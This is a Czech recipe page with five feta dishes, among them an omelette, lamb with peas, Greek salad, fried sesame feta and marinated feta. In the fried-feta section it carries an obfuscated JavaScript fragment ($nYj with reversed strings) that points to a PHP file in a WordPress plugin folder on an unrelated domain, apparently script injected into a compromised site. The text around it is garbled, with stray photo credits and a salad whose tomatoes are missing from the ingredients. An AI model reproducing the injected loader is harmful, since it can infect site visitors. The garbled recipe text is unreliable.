FACESTARReceptyŘECKÝ SÝR FETA PĚTKRÁT JINAK: SKVĚLÉ RECEPTY, KTERÉ OBOHATÍ VAŠE CHUŤOVÉ POHÁRKY!

ŘECKÝ SÝR FETA PĚTKRÁT JINAK: SKVĚLÉ RECEPTY, KTERÉ OBOHATÍ VAŠE CHUŤOVÉ POHÁRKY!

Také jej můžeme přidávat do omelet, na pizzu a do různých slaných koláčů, do salátů, do těstovin, kombinovat se zeleninou, grilovat a možností se určitě najde více.

Také jej můžeme přidávat do omelet, na pizzu a do různých slaných koláčů, do salátů, do těstovin, kombinovat se zeleninou, grilovat a možností se určitě najde více.

Vaječná omeleta s fetou a rajčaty

Ingredience:
5 velkých vajec
2 lžíce bazalkových lístků, pokrájených
1 lžíce čerstvé máty
3 jarní cibulky, pokrájené
2 lžíce oleje
75 g fety, rozdrobené
8 cherry rajčátek, pokrájených na poloviny
1 špetka soli
1 špetka pepře

and(flickr.com/Irina)

Postup přípravy:
Vejce rozklepneme do misky a lžičkou mírně našleháme, přidáme sůl a pepř, 2 lžíce vody, bazalku, máty a cibulku a promícháme. Na pánvi rozpálíme olej, vlijeme na ni vaječnou směs a smažíme 4 až 5 minut. Když je omeleta napůl hotová, přidáme fetu, a rajčata (řezem nahoru) a omeletu smažíme ještě 2 minuty. Přeneseme ji na nahřátý talíř a ihned podáváme.

Jehněčí steak s fetou a hráškem

Ingredience:
4 Jehněčí steaky z kýty
300 g zeleného hrášku
3 lžíce olivového oleje
Kůra a šťáva a 1 citronu
100 g fety, rozdrobené
Malá hrst mátových lístků, hrubě posekaných
2 jarní cibulky, jemně pokrájené
Sůl a pepř

Postup přípravy:
Steaky osolíme a opepříme a připravíme na grilu nebo na pánvi podle chuti (na požadovaný stupeň propečení).  Mezi tím povaříme hrášek (asi jen 2 minuty, aby změkl) Pak jej slijeme a promícháme s olivovým olejem, citronovou šťávou a kůrou. Pak do něj vmícháme fetu, mátu a cibulku a dochutíme pepřem a solí. Podáváme k steakům.

and(flickr.com/*Evelina*)

Řecký salát s fetou

Ingredience:
2 okurky, pokrájené na plátky
1 menší červená cibule, pokrájená na tenké plátky
Sůl a čerstvě namletý černý pepř
4 lžíce olivového oleje
1 a 1/2 lžičky sušeného oregána
200 g fety, rozdrobené
Hrst černých oliv

V misce promícháme rajčata, okurku a cibuli. Posolíme a necháme chvilku stát. Pak přidáme olivový olej, oregáno a pepř. Navrch rozdrobíme fetu a nasypeme olivy. K salátu se hodí řecký chléb pita.

and(flickr.com/Derek Lindahl)

Smažená feta v sezamovém semínku s medem

Ingredience:
250 g fety
2 vejce
1 lžička sladké papriky
1 lžička čerstvě namletého pepře
70 až 80 g mouky na obalení
60 g sezamového semínka
Olivový olej na smažení
4 lžíce medu

Postup přípravy:
Sýr nakrájme na malé kousky silné asi 1,5 cm. Vejce rozšleháme v jedné misce, v druhé smícháme mouku s paprikou a pepřem. Do třetí nasypeme sezamové semínko. Každý kousek sýra obalíme ve vejci, pak v mouce, pak znovu ve vejci a nakonec v sezamovém semínku.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahand-Sesame-Seeds-873×652.jpg“ />(mygreekdish.com)

Na pánvi rozpálíme olivový olej a sýr osmažíme ze všech stran. Pak jednotlivé kousky pokládáme na ubrousky. Med rozehřejeme, aby byl tekutý a fetu podáváme pokapanou horkým medem.

Marinovaná feta

Ingredience:
400g fety nebo balkánského sýra Naše bio
100g zelených a černých oliv
2 dl olivového oleje Billa
4 stroužky česneku
Hrst nasekaných bylinek (petržel, tymián, bazalka, máta)
Šťáva z jedné limetky
Sůl a zrnka celého pepře

Postup přípravy:
Sýr nakrájejte na kostičky. Z oleje, rozmělněného česneku, bylinek, soli, pepře a limetkové šťávy připravte marinádu, do které naložíte sýr a nechte dva dny v chladu odležet. Marinovaný sýr podávejte posypaný olivami. Chutná výborně s domácím pečivem.

and

Tip:
Sýr vyndejte z lednice minimálně hodinu před konzumací a uvolněte ho z obalu, aby se plně projevila jeho chuť, vůně a konzistence. V kombinaci s bylinkami a olivovým olejem je pro vaše tělo zdrojem kvalitního vápníku a bílkovin.

Související články